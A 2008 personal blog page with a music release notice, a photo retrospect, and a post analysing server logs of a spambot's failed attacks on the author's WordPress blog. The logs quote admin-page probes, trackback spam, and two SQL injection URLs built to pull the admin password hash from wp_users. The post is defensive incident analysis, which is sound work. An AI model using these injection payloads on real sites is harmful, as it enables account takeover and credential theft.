electro acoustic expressionism
nodepet
November 14th, 2008

[pc1108-01] night drone – drifts 1-4

Filed under: Music — olliver @ 23:18 h

Night Drone - Drifts 1-4 front cover It was about time for another Petcord release and really high time for the first release not by Giorgos or me (Petcord goes public, widening its scope – giving in to peer pressure ;-)). Steven Deacid from Cologne performs as Night Drone his Drifts 1-4 series. Apart from doing the cover artwork, I also contributed a reconstruction of Drift 2, which does not exactly sound like the rest of the tunes and is therefore easy to spot ;-).

Perhaps a few words about what can be expected:

Drifts 1-4 marks the beginning of a series of pieces that focus on deep saturated timbres and sustained tones blending into another. Sparsely arranged and yet successfully managing to escape monotony by constantly changing sound characteristics, an approach well known from Minimalist music. Drifts 1-4 prioritises the creation of a cinematic vision, a constant stream of floating association freely defined by the listener.

And more specifically:

[Drifts 1-4] takes analogue synth sounds characteristic of 90ies IDM electronica, but uses it within a Dark Ambient inspired context without any percussive elements. Because of this crossover, floating tones see constant modulation, addition and subtraction of overtones, as well as more distinct thematic progression. Due to sparse arrangements, Night Drone is capable of reaching clarity in blending tones and approaches sci-fi soundtrack quality, where others get lost in mushy reverberation and awkward sound clusters

source: Petcord liner notes

The release has a bit of a longer history, too: Originally planned for October, we had the idea of adding “demix” versions. One by me and another by Giorgos. Giorgos’ however was not able to complete the tune in time, so it was omitted. As a result of some discussions, the project name and the entire scope of the music changed and so did the cover artwork. But nothing that prevented the release from finally happening ;-)

Comments (0)

November 13th, 2008

failed blogspam automation from China

Filed under: Spam — olliver @ 23:31 h

An exceptionally dumb spambot from China visited my blog and tried to run several Wordpress vulnerabilities that might have worked once with ancient versions. Let me split its traces into several parts:

1. Checking for a no longer existing article and not quite understanding the difference between mod-rewrite fake directories and actual directories. Maybe this script was optimised for blogs who run Wordpress in its stock query string mode (which is brief but not really the most you can get from your blog search engine wise):

58.241.255.38 – - [13/Nov/2008:21:28:15 +0100] “HEAD /using-bbclone-with-wordpress-232-the-almost-easy-way/wp-admin/index.php HTTP/1.1″ 404 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:16 +0100] “GET /using-bbclone-with-wordpress-232-the-almost-easy-way/ HTTP/1.1″ 404 6045 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

I’m seeing this quite often and usually this is all that will happen. But not at this time…

2. Trying to mess around in the admin section and not figuring out that I restricted access to my own ip address ranges. Obviously the script has no handler for 403 responses and thus keeps on trying something which isn’t going to work…

58.241.255.38 – - [13/Nov/2008:21:28:18 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:19 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:20 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:21 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:22 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:23 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:24 +0100] “HEAD /wp-login.php?action=logout HTTP/1.1″ 302 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:28:25 +0100] “HEAD /wp-admin/theme-editor.php HTTP/1.1″ 403 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

This silliness went on for a minute like this, apparently trying to exploit a long fixed vulnerability in Wordpress’ admin section.

3. It follows another try at exploiting an old security hole in the admin section (still not getting that access if forbidden….) before the script finally resorts to plugging trackback spam, which isn’t working either :-). Most people have turned off this feature in the interim, because spammers rendered this feature entirely useless and there are alternative means to learn about one’s backlinks.

58.241.255.38 – - [13/Nov/2008:21:29:11 +0100] “POST /wp-admin/admin-ajax.php HTTP/1.1″ 403 225 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:12 +0100] “GET /xmlrpc.php HTTP/1.1″ 200 42 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:13 +0100] “POST /xmlrpc.php HTTP/1.1″ 200 774 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:14 +0100] “POST /wp-trackback.php?tb_id=1 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

4. Attempts at an SQL injection

58.241.255.38 – - [13/Nov/2008:21:29:16 +0100] “GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+
wp_users+where+id=1/* HTTP/1.1″ 301 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:17 +0100] “GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+
FROM+wp_users+where+id=1/* HTTP/1.1″ 301 – “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

This has already been fixed for a while and is designed to compromise the admin account (user id=1). Spammers use this for adding or modifying content on a compromised site which then will be spamvertised via blogspam or, if the site attracts enough traffic, for running exploits via inserted iframes.

5. Looking for non-existing trackbacks

58.241.255.38 – - [13/Nov/2008:21:29:18 +0100] “GET /wp-trackback.php?p=1 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:19 +0100] “GET /wp-trackback.php?p=2 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:20 +0100] “GET /wp-trackback.php?p=3 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:21 +0100] “GET /wp-trackback.php?p=4 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:23 +0100] “GET /wp-trackback.php?p=5 HTTP/1.1″ 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

This went on till “p” reached the value 25 and was entirely useless because even if trackbacks were enabled, the request was malformed (lacking an id).

6. Repeating trackback spam attempts that didn’t work out before…

58.241.255.38 – - [13/Nov/2008:21:29:48 +0100] “GET /xmlrpc.php HTTP/1.1″ 200 42 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
58.241.255.38 – - [13/Nov/2008:21:29:50 +0100] “POST /xmlrpc.php HTTP/1.1″ 200 473 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

The host 58.241.255.38 is located in China and looks like a compromised machine nobody bothers to fix:
http://www.google.com/search?q=58.241.255.38

route:        58.240.0.0/15
origin:       AS4837
descr:        CHINA169-BACKBONE CNCGROUP China169 Backbone
lastupd-frst: 2008-05-19 12:06Z  202.249.2.169@rrc06
lastupd-last: 2008-11-13 13:38Z  193.232.244.111@rrc13
seen-at:      rrc00,rrc01,rrc03,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,
              rrc14,rrc15,rrc16
num-rispeers: 113
source:       RISWHOIS

The script itself, as indicated by its user agent and modus operandi, has been seen for a while at different occasions:
http://www.google.com/search?q=k1b+compatible%3B+rss+6.0%3B+Windows+Sot+5.1+Security+Kol

Blocking the user agent via SetEnvIf/Rewrite rules should already take care of the problem. Additionally firewalling or denying access for this unmaintained machine may be a good idea, too.

Comments (0)

November 4th, 2008

Photo retrospect second quarter of 2008

Filed under: Photo — olliver @ 12:16 h

I’m lagging behind with my photo posts, so here comes the photographic retrospect for the second quarter of the year:

lit doorway   hanging twigs   tomb with ivy

lament   rails and contre jour   Agava in front of chapel

chasing shadows   rails and contre jour II   rails and contre jour III

View towards hills   roofs   entrance and contre jour

Comments (0)